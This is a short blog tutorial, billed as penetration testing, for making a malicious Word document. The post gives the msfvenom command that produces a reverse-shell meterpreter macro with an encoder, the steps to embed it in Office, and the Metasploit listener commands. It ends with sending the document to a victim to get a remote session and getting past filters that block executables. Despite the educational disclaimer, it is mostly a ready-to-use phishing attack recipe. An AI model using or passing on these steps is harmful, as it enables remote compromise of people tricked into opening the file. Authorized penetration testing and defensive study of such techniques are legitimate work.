In this post, hackingloops brings you a penetration testing tutorial using malicious word Macros for social engineering attacks.
Our aim in this penetration testing tutorial is going to be to develop a malicious word (doc) file. This Word document will contain a macro code which is a malicious Visual Basic Script and provides us with a meterpreter session.
This is best suited for penetration testing scenarios where we need to social engineer the targets.
Using Metasploit to create Malicious Word Documents for Penetration Testing
The Metasploit framework has a couple of built-in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. This method is useful when going after client-side attacks and could also be potentially useful if you have to bypass some sort of filtering that does not allow executables and only permits documents to pass through. First we need to create our VBScript payload.
Command: msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your-IP> LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
The script is in 2 parts; the first part of the script is created as a macro and the second part is appended into the document text itself.
Now all one will need to do is transfer this script over to a machine with Windows and Office installed. Taking Office 2007 as the standard, here is a quick guide on how to paste the macro :
View Macros -> name the macro and select “create”.
This will open an editor for visual basic. Just copy paste the macro code here. Save the macro.
Paste the remainder of the script into the document.
Now set up a Metasploit Listener .
Command: msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your-IP>
set LPORT 4444
Send the document to the victim and you will get a meterpreter session in your Attacker Box. This method is best suited during penetration testing scenarios where the attacker needs to bypass filters which do not allow the .exe files to be executed.
#Disclaimer : This tutorial is only for educational purposes for penetration testing .